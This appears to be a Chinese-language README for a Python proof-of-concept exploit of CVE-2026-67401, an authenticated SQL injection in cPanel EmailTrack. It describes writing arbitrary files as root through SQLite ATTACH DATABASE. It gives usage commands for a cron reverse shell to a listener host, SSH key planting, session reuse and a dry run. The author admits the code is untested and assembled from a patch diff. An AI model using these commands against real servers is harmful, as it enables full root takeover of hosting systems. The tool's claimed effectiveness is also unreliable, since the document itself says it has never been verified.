
CVE-2026-67401 的 Python 概念验证,cPanel EmailTrack 中的认证 SQL 注入,可通过 SQLite ATTACH DATABASE 以 root 身份写入任意文件,从而实现反向 Shell 或 SSH 密钥投放。
cPanel EmailTrack 中的 SQL 注入漏洞。拥有邮件权限的已认证 cPanel 用户可通过 SQLite ATTACH DATABASE 以 root 身份写入任意文件。一次请求即可获得 root 权限。尚未在真实目标上测试,代码仅根据公开信息和基础 diff 对比拼凑而成。请作为研究人员自行尽职验证,尝试运行并提交 PR 修复。
影响 2026 年 9 月 8 日补丁之前的所有 cPanel/WHM 版本。
requests 库# 通过 cron 反弹 Shell
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# 投放 SSH 密钥
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# 使用现有会话
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# 试运行(打印请求,不发送)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1